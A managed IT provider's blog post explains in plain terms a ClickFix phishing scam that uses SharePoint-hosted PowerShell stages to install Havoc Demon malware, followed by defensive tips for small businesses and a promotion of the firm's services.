The Latest Hack: The SharePoint Security Threat You Didn’t See Coming
A new phishing scam is making the rounds, and this time, it’s using a combination of both phishing and SharePoint malware to bypass security software. Read on to learn how this attack works and how to keep your business safe from business data breach threats.
The Hack
Like many phishing scams, it starts with an email. In this instance, the email contains an HTML attachment that displays a fake error message when opened. The message provides “instructions” to fix the supposed issue, directing users to copy and run a malicious PowerShell Command.
Wait, What’s PowerShell?
PowerShell is a built-in Windows tool that IT pros use to run commands and manage systems. Think of it like the control room of your computer – it gives direct access to important settings and operations. In the right hands, it’s a powerful IT tool, but if misused, it can cause serious damage. That’s why hackers try to trick people into running dangerous commands without realizing it – a social engineering method known as the ClickFix Technique.
How Does SharePoint Fit In?
Once the malicious command is executed, it downloads and runs a PowerShell script – a short program – hosted on a hacker-controlled SharePoint site. This script checks for cybersecurity solutions before proceeding. If the coast is clear, it then downloads another program that allows it to run yet another script from the same SharePoint site. This final script installs and launches malware known as Havoc Demon. From there, Havoc Demon allows attackers to steal sensitive files, move through a company’s network, and even run more malicious code remotely.
SharePoint is playing a critical role here as the hackers are craftily using this Microsoft service to host each stage of their malware. Because SharePoint is trusted by many security tools, this connection won’t immediately raise any red flags – allowing the code to be installed on your computer without detection. Once this happens, Havoc is deployed through SharePoint, and just like that, the hackers have control of your system.
How Does this Affect Small and Medium-Sized Businesses?
Many businesses rely on Microsoft 365, SharePoint, and PowerShell, making this attack especially effective. The initial phishing method aims to blend in with normal activity, and because the malware is downloaded through SharePoint, it’s harder to detect. If even one employee falls for this, it could expose sensitive company and customer data, give attackers a foothold in your network, and potentially lead to ransomware deployment across your business.
What Can You Do?
To help avoid potential attacks through trusted software, IT teams should do the following:
- Restrict external SharePoint file access to prevent unauthorized file sharing.
- Keep software up to date – this attack specifically checks for weak security measures, so strong, updated defenses make a big difference.
- Monitor unusual SharePoint activity to catch suspicious behavior early.
- Block PowerShell execution for non-administrative users.
- Never copy and paste commands from an email or an unknown file – if you don’t fully understand what it does, don’t run it.
If your business has already been affected, it’s crucial to act fast. Follow these steps if your business is targeted by a phishing attack – isolate infected systems, reset compromised credentials, and report the incident to cybersecurity professionals.
How an MSP Can Help
Alternatively, partnering with a trusted MSP like us means teaming up with security experts who have both the resources and expertise to deal with threats just like this one. Having an MSP in your corner means not having to worry (as much) about security threats, while having someone to handle your security updates.
Moral of the Story
Phishing attacks are evolving, and the latest ClickFix scam takes things to a new level. By tricking users into running malicious code themselves and exploiting SharePoint’s security trust, hackers have created a dangerous new threat.
That’s why you need to stay vigilant, keep security software updated, and work with experts who can keep you safe. If you’re worried about your company’s security, give us a call. Together, we can keep the hackers at bay.
About The 20 MSP
As a leading provider of managed IT services, The 20 MSP serves thousands of businesses nationwide, including single and multi-location organizations, delivering white-glove service, secure and streamlined IT infrastructure, and 24/7/365 support. We believe in building lasting relationships with clients founded on trust, communication, and the delivery of high-value services for a fair and predictable price. Our client’s success is our success, and we are committed to helping each and every organization we serve leverage technology to secure a competitive advantage and achieve new growth. To learn more, visit the20msp.com.
